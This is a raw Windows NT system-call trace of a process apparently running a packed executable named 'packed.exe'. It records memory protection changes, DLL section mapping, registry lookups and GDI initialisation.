 00166   748   NtProtectVirtualMemory  (-1, (0x77121000), 4096, 32, ... (0x77121000), 4096, 4, ) == 0x0
 00167   748   NtFlushInstructionCache  (-1, 1997672448, 1272, ... ) == 0x0
 00168   748   NtProtectVirtualMemory  (-1, (0x77121000), 1272, 4, ... (0x77121000), 4096, 32, ) == 0x0
 00169   748   NtProtectVirtualMemory  (-1, (0x77121000), 4096, 32, ... (0x77121000), 4096, 4, ) == 0x0
 00170   748   NtFlushInstructionCache  (-1, 1997672448, 1272, ... ) == 0x0
 00171   748   NtProtectVirtualMemory  (-1, (0x77121000), 1272, 4, ... (0x77121000), 4096, 32, ) == 0x0
 00172   748   NtProtectVirtualMemory  (-1, (0x77121000), 4096, 32, ... (0x77121000), 4096, 4, ) == 0x0
 00173   748   NtFlushInstructionCache  (-1, 1997672448, 1272, ... ) == 0x0
 00174   748   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "ole32.dll"}, ... 16, ) }, ... 16, ) == 0x0
 00175   748   NtMapViewOfSection  (16, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x774e0000), 0x0, 1298432, ) == 0x0
 00176   748   NtClose  (16, ... ) == 0x0
 00177   748   NtProtectVirtualMemory  (-1, (0x774e1000), 2352, 4, ... (0x774e1000), 4096, 32, ) == 0x0
 00178   748   NtProtectVirtualMemory  (-1, (0x774e1000), 4096, 32, ... (0x774e1000), 4096, 4, ) == 0x0
 00179   748   NtFlushInstructionCache  (-1, 2001604608, 2352, ... ) == 0x0
 00180   748   NtProtectVirtualMemory  (-1, (0x774e1000), 2352, 4, ... (0x774e1000), 4096, 32, ) == 0x0
 00181   748   NtProtectVirtualMemory  (-1, (0x774e1000), 4096, 32, ... (0x774e1000), 4096, 4, ) == 0x0
 00182   748   NtFlushInstructionCache  (-1, 2001604608, 2352, ... ) == 0x0
 00183   748   NtProtectVirtualMemory  (-1, (0x774e1000), 2352, 4, ... (0x774e1000), 4096, 32, ) == 0x0
 00184   748   NtProtectVirtualMemory  (-1, (0x774e1000), 4096, 32, ... (0x774e1000), 4096, 4, ) == 0x0
 00185   748   NtFlushInstructionCache  (-1, 2001604608, 2352, ... ) == 0x0
 00186   748   NtProtectVirtualMemory  (-1, (0x774e1000), 2352, 4, ... (0x774e1000), 4096, 32, ) == 0x0
 00187   748   NtProtectVirtualMemory  (-1, (0x774e1000), 4096, 32, ... (0x774e1000), 4096, 4, ) == 0x0
 00188   748   NtFlushInstructionCache  (-1, 2001604608, 2352, ... ) == 0x0
 00189   748   NtProtectVirtualMemory  (-1, (0x774e1000), 2352, 4, ... (0x774e1000), 4096, 32, ) == 0x0
 00190   748   NtProtectVirtualMemory  (-1, (0x774e1000), 4096, 32, ... (0x774e1000), 4096, 4, ) == 0x0
 00191   748   NtFlushInstructionCache  (-1, 2001604608, 2352, ... ) == 0x0
 00192   748   NtProtectVirtualMemory  (-1, (0x774e1000), 2352, 4, ... (0x774e1000), 4096, 32, ) == 0x0
 00193   748   NtProtectVirtualMemory  (-1, (0x774e1000), 4096, 32, ... (0x774e1000), 4096, 4, ) == 0x0
 00194   748   NtFlushInstructionCache  (-1, 2001604608, 2352, ... ) == 0x0
 00195   748   NtProtectVirtualMemory  (-1, (0x774e1000), 2352, 4, ... (0x774e1000), 4096, 32, ) == 0x0
 00196   748   NtProtectVirtualMemory  (-1, (0x774e1000), 4096, 32, ... (0x774e1000), 4096, 4, ) == 0x0
 00197   748   NtFlushInstructionCache  (-1, 2001604608, 2352, ... ) == 0x0
 00198   748   NtProtectVirtualMemory  (-1, (0x77121000), 1272, 4, ... (0x77121000), 4096, 32, ) == 0x0
 00199   748   NtProtectVirtualMemory  (-1, (0x77121000), 4096, 32, ... (0x77121000), 4096, 4, ) == 0x0
 00200   748   NtFlushInstructionCache  (-1, 1997672448, 1272, ... ) == 0x0
 00201   748   NtProtectVirtualMemory  (-1, (0x77121000), 1272, 4, ... (0x77121000), 4096, 32, ) == 0x0
 00202   748   NtProtectVirtualMemory  (-1, (0x77121000), 4096, 32, ... (0x77121000), 4096, 4, ) == 0x0
 00203   748   NtFlushInstructionCache  (-1, 1997672448, 1272, ... ) == 0x0
 00204   748   NtProtectVirtualMemory  (-1, (0x77121000), 1272, 4, ... (0x77121000), 4096, 32, ) == 0x0
 00205   748   NtProtectVirtualMemory  (-1, (0x77121000), 4096, 32, ... (0x77121000), 4096, 4, ) == 0x0
 00206   748   NtFlushInstructionCache  (-1, 1997672448, 1272, ... ) == 0x0
 00207   748   NtProtectVirtualMemory  (-1, (0x46b000), 106496, 4, ... (0x46b000), 106496, 64, ) == 0x0
 00208   748   NtProtectVirtualMemory  (-1, (0x46b000), 106496, 64, ... (0x46b000), 106496, 4, ) == 0x0
 00209   748   NtFlushInstructionCache  (-1, 4632576, 106496, ... ) == 0x0
 00210   748   NtProtectVirtualMemory  (-1, (0x46b000), 106496, 4, ... (0x46b000), 106496, 64, ) == 0x0
 00211   748   NtProtectVirtualMemory  (-1, (0x46b000), 106496, 64, ... (0x46b000), 106496, 4, ) == 0x0
 00212   748   NtFlushInstructionCache  (-1, 4632576, 106496, ... ) == 0x0
 00213   748   NtQueryInformationProcess  (-1, 37, 48, ... {process info, class 37, size 48}, 0x0, ) == 0x0
 00214   748   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\u:\work\packed.exe"}, 5, 96, ... 16, {status=0x0, info=1}, ) }, 5, 96, ... 16, {status=0x0, info=1}, ) == 0x0
 00215   748   NtReadFile  (16, 0, 0, 0, 4, {217084, 0}, 0, ... {status=0x0, info=4},  (16, 0, 0, 0, 4, {217084, 0}, 0, ... {status=0x0, info=4}, "\312$\302\7", ) , ) == 0x0
 00216   748   NtClose  (16, ... ) == 0x0
 00217   748   NtSetInformationProcess  (-1, 34, {process info, class 34, size 4}, 4, ... ) == 0x0
 00218   748   NtOpenProcessToken  (-1, 0x8, ... 16, ) == 0x0
 00219   748   NtQueryInformationToken  (16, Statistics, 56, ... {token info, class 10, size 56}, 56, ) == 0x0
 00220   748   NtClose  (16, ... ) == 0x0
 00221   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\Terminal Server"}, ... 16, ) }, ... 16, ) == 0x0
 00222   748   NtQueryValueKey  (16,  (16, "TSAppCompat", Partial, 548, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 548, ... TitleIdx=0, Type=4, Data= (16, "TSAppCompat", Partial, 548, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 00223   748   NtClose  (16, ... ) == 0x0
 00224   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msvcrt.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00225   748   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 00226   748   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 3276800, 65536, ) == 0x0
 00227   748   NtAllocateVirtualMemory  (-1, 3276800, 0, 4096, 4096, 4, ... 3276800, 4096, ) == 0x0
 00228   748   NtAllocateVirtualMemory  (-1, 3280896, 0, 8192, 4096, 4, ... 3280896, 8192, ) == 0x0
 00229   748   NtAllocateVirtualMemory  (-1, 3289088, 0, 4096, 4096, 4, ... 3289088, 4096, ) == 0x0
 00230   748   NtOpenSection  (0x4, {24, 0, 0x40, 0, 0,  (0x4, {24, 0, 0x40, 0, 0, "\NLS\NlsSectionCType"}, ... 16, ) }, ... 16, ) == 0x0
 00231   748   NtMapViewOfSection  (16, -1, (0x0), 0, 0, 0x0, 0, 2, 0, 2, ... (0x330000), 0x0, 12288, ) == 0x0
 00232   748   NtClose  (16, ... ) == 0x0
 00233   748   NtAllocateVirtualMemory  (-1, 3293184, 0, 4096, 4096, 4, ... 3293184, 4096, ) == 0x0
 00234   748   NtQueryVirtualMemory  (-1, 0x77c2807c, Basic, 28, ... {BaseAddress=0x77c28000,AllocationBase=0x77c10000,AllocationProtect=0x80,RegionSize=0x35000,State=0x1000,Protect=0x20,Type=0x1000000,}, 28, ) == 0x0
 00235   748   NtQueryInformationProcess  (-1, 36, 4, ... {process info, class 36, size 4}, 0x0, ) == 0x0
 00236   748   NtQueryInformationProcess  (-1, 36, 4, ... {process info, class 36, size 4}, 0x0, ) == 0x0
 00237   748   NtQueryVirtualMemory  (-1, 0x0, Basic, 28, ... {BaseAddress=0x0,AllocationBase=0x0,AllocationProtect=0x0,RegionSize=0x10000,State=0x10000,Protect=0x1,Type=0x0,}, 28, ) == 0x0
 00238   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RPCRT4.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00239   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ADVAPI32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00240   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\Terminal Server"}, ... 16, ) }, ... 16, ) == 0x0
 00241   748   NtQueryValueKey  (16,  (16, "TSAppCompat", Partial, 548, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 548, ... TitleIdx=0, Type=4, Data= (16, "TSAppCompat", Partial, 548, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 00242   748   NtQueryValueKey  (16,  (16, "TSUserEnabled", Partial, 548, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 548, ... TitleIdx=0, Type=4, Data= (16, "TSUserEnabled", Partial, 548, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 00243   748   NtClose  (16, ... ) == 0x0
 00244   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"}, ... 16, ) }, ... 16, ) == 0x0
 00245   748   NtQueryValueKey  (16,  (16, "LeakTrack", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00246   748   NtClose  (16, ... ) == 0x0
 00247   748   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\MACHINE"}, ... 16, ) }, ... 16, ) == 0x0
 00248   748   NtSetInformationObject  (16, Handle, {Inherit=0,ProtectFromClose=1,}, 2011431168, ... ) == 0x0
 00249   748   NtOpenKey  (0x20019, {24, 16, 0x40, 0, 0,  (0x20019, {24, 16, 0x40, 0, 0, "Software\Microsoft\Windows NT\CurrentVersion\Diagnostics"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00250   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WS2HELP.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00251   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ws2_32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00252   748   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 00253   748   NtQuerySystemInformation  (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0
 00254   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\USER32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00255   748   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 00256   748   NtRequestWaitReplyPort  (24, {28, 56, new_msg, 0, 256, 1243092, 256, 1242836}  (24, {28, 56, new_msg, 0, 256, 1243092, 256, 1242836} "\210\6\31\1\0\0\0\0\0\0\0\0\1\0\0\0\3\0\0\0\234\6\31\1$\1\0\0" ... {28, 56, reply, 0, 484, 748, 57964, 0} "\320G\26\0\0\0\0\0\0\0\0\0\1\0\0\0\3\0\0\0\234\6\31\1$\1\0\0" )  ... {28, 56, reply, 0, 484, 748, 57964, 0}  (24, {28, 56, new_msg, 0, 256, 1243092, 256, 1242836} "\210\6\31\1\0\0\0\0\0\0\0\0\1\0\0\0\3\0\0\0\234\6\31\1$\1\0\0" ... {28, 56, reply, 0, 484, 748, 57964, 0} "\320G\26\0\0\0\0\0\0\0\0\0\1\0\0\0\3\0\0\0\234\6\31\1$\1\0\0" )  ) == 0x0
 00257   748   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\Registry\MACHINE\System\CurrentControlSet\Control\Session Manager"}, ... 28, ) }, ... 28, ) == 0x0
 00258   748   NtQueryValueKey  (28,  (28, "SafeDllSearchMode", Partial, 16, ... ) , Partial, 16, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00259   748   NtClose  (28, ... ) == 0x0
 00260   748   NtAllocateVirtualMemory  (-1, 1327104, 0, 4096, 4096, 4, ... 1327104, 4096, ) == 0x0
 00261   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\IMM32.DLL"}, 1239420, ... ) }, 1239420, ... ) == 0x0
 00262   748   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\IMM32.DLL"}, 5, 96, ... 28, {status=0x0, info=1}, ) }, 5, 96, ... 28, {status=0x0, info=1}, ) == 0x0
 00263   748   NtCreateSection  (0xe, 0x0, 0x0, 16, 134217728, 28, ... 32, ) == 0x0
 00264   748   NtClose  (28, ... ) == 0x0
 00265   748   NtMapViewOfSection  (32, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0x340000), 0x0, 110592, ) == 0x0
 00266   748   NtClose  (32, ... ) == 0x0
 00267   748   NtUnmapViewOfSection  (-1, 0x340000, ... ) == 0x0
 00268   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\IMM32.DLL"}, 1239328, ... ) }, 1239328, ... ) == 0x0
 00269   748   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\IMM32.DLL"}, 5, 96, ... 32, {status=0x0, info=1}, ) }, 5, 96, ... 32, {status=0x0, info=1}, ) == 0x0
 00270   748   NtCreateSection  (0xe, 0x0, 0x0, 16, 134217728, 32, ... 28, ) == 0x0
 00271   748   NtClose  (32, ... ) == 0x0
 00272   748   NtMapViewOfSection  (28, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0x340000), 0x0, 110592, ) == 0x0
 00273   748   NtClose  (28, ... ) == 0x0
 00274   748   NtUnmapViewOfSection  (-1, 0x340000, ... ) == 0x0
 00275   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\IMM32.DLL"}, 1239636, ... ) }, 1239636, ... ) == 0x0
 00276   748   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\IMM32.DLL"}, 5, 96, ... 28, {status=0x0, info=1}, ) }, 5, 96, ... 28, {status=0x0, info=1}, ) == 0x0
 00277   748   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 28, ... 32, ) == 0x0
 00278   748   NtQuerySection  (32, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 00279   748   NtClose  (28, ... ) == 0x0
 00280   748   NtMapViewOfSection  (32, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x76390000), 0x0, 118784, ) == 0x0
 00281   748   NtClose  (32, ... ) == 0x0
 00282   748   NtProtectVirtualMemory  (-1, (0x76391000), 696, 4, ... (0x76391000), 4096, 32, ) == 0x0
 00283   748   NtProtectVirtualMemory  (-1, (0x76391000), 4096, 32, ... (0x76391000), 4096, 4, ) == 0x0
 00284   748   NtFlushInstructionCache  (-1, 1983451136, 696, ... ) == 0x0
 00285   748   NtProtectVirtualMemory  (-1, (0x76391000), 696, 4, ... (0x76391000), 4096, 32, ) == 0x0
 00286   748   NtProtectVirtualMemory  (-1, (0x76391000), 4096, 32, ... (0x76391000), 4096, 4, ) == 0x0
 00287   748   NtFlushInstructionCache  (-1, 1983451136, 696, ... ) == 0x0
 00288   748   NtProtectVirtualMemory  (-1, (0x76391000), 696, 4, ... (0x76391000), 4096, 32, ) == 0x0
 00289   748   NtProtectVirtualMemory  (-1, (0x76391000), 4096, 32, ... (0x76391000), 4096, 4, ) == 0x0
 00290   748   NtFlushInstructionCache  (-1, 1983451136, 696, ... ) == 0x0
 00291   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IMM32.DLL"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00292   748   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 00293   748   NtAllocateVirtualMemory  (-1, 1228800, 0, 4096, 4096, 260, ... 1228800, 4096, ) == 0x0
 00294   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\IMM32.DLL"}, 1236552, ... ) }, 1236552, ... ) == 0x0
 00295   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ntdll.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00296   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kernel32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00297   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GDI32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00298   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ole32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00299   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\oleaut32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00300   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\IMM32.DLL"}, 1239956, ... ) }, 1239956, ... ) == 0x0
 00301   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\Error Message Instrument\"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00302   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize"}, ... 32, ) }, ... 32, ) == 0x0
 00303   748   NtQueryValueKey  (32,  (32, "DisableMetaFiles", Partial, 20, ... ) , Partial, 20, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00304   748   NtClose  (32, ... ) == 0x0
 00305   748   NtMapViewOfSection  (-2147482740, -1, (0x0), 0, 0, 0x0, 0, 2, 0, 2, ... (0x560000), 0x0, 1060864, ) == 0x0
 00306   748   NtClose  (-2147482740, ... ) == 0x0
 00307   748   NtCreateEvent  (0x1f0003, 0x0, 1, 0, ... 32, ) == 0x0
 00308   748   NtOpenThreadTokenEx  (-2, 0x8, 1, 512, ... ) == STATUS_NO_TOKEN
 00309   748   NtOpenProcessTokenEx  (-1, 0x8, 512, ... -2147482740, ) == 0x0
 00310   748   NtQueryInformationToken  (-2147482740, Statistics, 0, ... ) == STATUS_BUFFER_TOO_SMALL
 00311   748   NtQueryInformationToken  (-2147482740, Statistics, 56, ... {token info, class 10, size 56}, 56, ) == 0x0
 00312   748   NtClose  (-2147482740, ... ) == 0x0
 00313   748   NtAllocateVirtualMemory  (-1, 0, 0, 32, 4096, 4, ... 3407872, 4096, ) == 0x0
 00314   748   NtFreeVirtualMemory  (-1, (0x340000), 4096, 32768, ... (0x340000), 4096, ) == 0x0
 00315   748   NtDuplicateObject  (-1, 28, -1, 0x0, 0, 2, ... 40, ) == 0x0
 00316   748   NtOpenKey  (0x20019, {24, 0, 0x240, 0, 0,  (0x20019, {24, 0, 0x240, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Compatibility32"}, ... -2147482740, ) }, ... -2147482740, ) == 0x0
 00317   748   NtQueryValueKey  (-2147482740,  (-2147482740, "packed", Partial, 172, ... ) , Partial, 172, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00318   748   NtClose  (-2147482740, ... ) == 0x0
 00319   748   NtOpenKey  (0x20019, {24, 0, 0x240, 0, 0,  (0x20019, {24, 0, 0x240, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\IME Compatibility"}, ... -2147482740, ) }, ... -2147482740, ) == 0x0
 00320   748   NtQueryValueKey  (-2147482740,  (-2147482740, "packed", Partial, 172, ... ) , Partial, 172, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00321   748   NtClose  (-2147482740, ... ) == 0x0
 00322   748   NtQueryDefaultLocale  (0, -139609780, ... ) == 0x0
 00323   748   NtGdiQueryFontAssocInfo  (0, ... ) == 0x0
 00324   748   NtUserCallNoParam  (24, ... ) == 0x0
 00325   748   NtGdiCreateCompatibleDC  (0, ...
 00326   748   NtAllocateVirtualMemory  (-1, 0, 0, 4096, 12288, 4, ... 3407872, 4096, ) == 0x0
 00325   748   NtGdiCreateCompatibleDC  ... ) == 0xee0105b0
 00327   748   NtGdiGetStockObject  (0, ... ) == 0x1900010
 00328   748   NtGdiGetStockObject  (4, ... ) == 0x1900011
 00329   748   NtGdiCreateBitmap  (8, 8, 1, 1, 2118200212, ... ) == 0x76050581
 00330   748   NtGdiCreateSolidBrush  (0, 0, ...
 00331   748   NtAllocateVirtualMemory  (-1, 0, 0, 4096, 12288, 4, ... 3473408, 4096, ) == 0x0
 00330   748   NtGdiCreateSolidBrush  ... ) == 0xa51003d2
 00332   748   NtGdiGetStockObject  (13, ... ) == 0x18a0021
 00333   748   NtGdiCreateCompatibleDC  (0, ... ) == 0x5201039b
 00334   748   NtGdiSelectBitmap  (1375798171, 1980040577, ... ) == 0x185000f
 00335   748   NtUserGetThreadDesktop  (748, 0, ... ) == 0x24
 00336   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Windows"}, ... 44, ) }, ... 44, ) == 0x0
 00337   748   NtQueryValueKey  (44,  (44, "AppInit_DLLs", Partial, 64, ... TitleIdx=0, Type=1, Data="\0\0"}, 14, ) , Partial, 64, ... TitleIdx=0, Type=1, Data= (44, "AppInit_DLLs", Partial, 64, ... TitleIdx=0, Type=1, Data="\0\0"}, 14, ) }, 14, ) == 0x0
 00338   748   NtClose  (44, ... ) == 0x0
 00339   748   NtUserFindExistingCursorIcon  (1241132, 1241148, 1241196, ... ) == 0x10011
 00340   748   NtUserRegisterClassExWOW  (1241144, 1241212, 1241228, 1241244, 673, 128, 0, ... ) == 0x8174c017
 00341   748   NtUserFindExistingCursorIcon  (1241132, 1241148, 1241196, ... ) == 0x10011
 00342   748   NtUserRegisterClassExWOW  (1241144, 1241212, 1241228, 1241244, 674, 128, 0, ... ) == 0x8174c01c
 00343   748   NtUserFindExistingCursorIcon  (1241132, 1241148, 1241196, ... ) == 0x10011
 00344   748   NtUserRegisterClassExWOW  (1241144, 1241212, 1241228, 1241244, 675, 128, 0, ... ) == 0x8174c01e
 00345   748   NtUserFindExistingCursorIcon  (1241132, 1241148, 1241196, ... ) == 0x10011
 00346   748   NtUserRegisterClassExWOW  (1241144, 1241212, 1241228, 1241244, 676, 128, 0, ... ) == 0x81748002
 00347   748   NtUserFindExistingCursorIcon  (1241132, 1241148, 1241196, ... ) == 0x10013
 00348   748   NtUserRegisterClassExWOW  (1241144, 1241212, 1241228, 1241244, 677, 128, 0, ... ) == 0x8174c018
 00349   748   NtUserFindExistingCursorIcon  (1241132, 1241148, 1241196, ... ) == 0x10011
 00350   748   NtUserRegisterClassExWOW  (1241144, 1241212, 1241228, 1241244, 678, 128, 0, ... ) == 0x8174c01a
 00351   748   NtUserFindExistingCursorIcon  (1241132, 1241148, 1241196, ... ) == 0x10011
 00352   748   NtUserRegisterClassExWOW  (1241144, 1241212, 1241228, 1241244, 679, 128, 0, ... ) == 0x8174c01d
 00353   748   NtUserFindExistingCursorIcon  (1241132, 1241148, 1241196, ... ) == 0x10011
 00354   748   NtUserRegisterClassExWOW  (1241144, 1241212, 1241228, 1241244, 681, 128, 0, ... ) == 0x8174c026
 00355   748   NtUserFindExistingCursorIcon  (1241132, 1241148, 1241196, ... ) == 0x10011
 00356   748   NtUserRegisterClassExWOW  (1241144, 1241212, 1241228, 1241244, 680, 128, 0, ... ) == 0x8174c019
 00357   748   NtUserRegisterClassExWOW  (1241096, 1241164, 1241180, 1241196, 0, 128, 0, ... ) == 0x8174c020
 00358   748   NtUserRegisterClassExWOW  (1241352, 1241448, 1241432, 1241420, 0, 130, 0, ... ) == 0x8174c022
 00359   748   NtUserRegisterClassExWOW  (1241096, 1241164, 1241180, 1241196, 0, 128, 0, ... ) == 0x8174c023
 00360   748   NtUserRegisterClassExWOW  (1241352, 1241448, 1241432, 1241420, 0, 130, 0, ... ) == 0x8174c024
 00361   748   NtUserRegisterClassExWOW  (1241096, 1241164, 1241180, 1241196, 0, 128, 0, ... ) == 0x8174c025
 00362   748   NtCallbackReturn  (0, 0, 0, ...
 00363   748   NtGdiInit  (... ) == 0x1
 00364   748   NtGdiGetStockObject  (18, ... ) == 0x290001c
 00365   748   NtGdiGetStockObject  (19, ... ) == 0x1b00019
 00366   748   NtAllocateVirtualMemory  (-1, 1331200, 0, 4096, 4096, 4, ... 1331200, 4096, ) == 0x0
 00367   748   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\Device\KsecDD"}, 7, 16, ... 44, {status=0x0, info=0}, ) }, 7, 16, ... 44, {status=0x0, info=0}, ) == 0x0
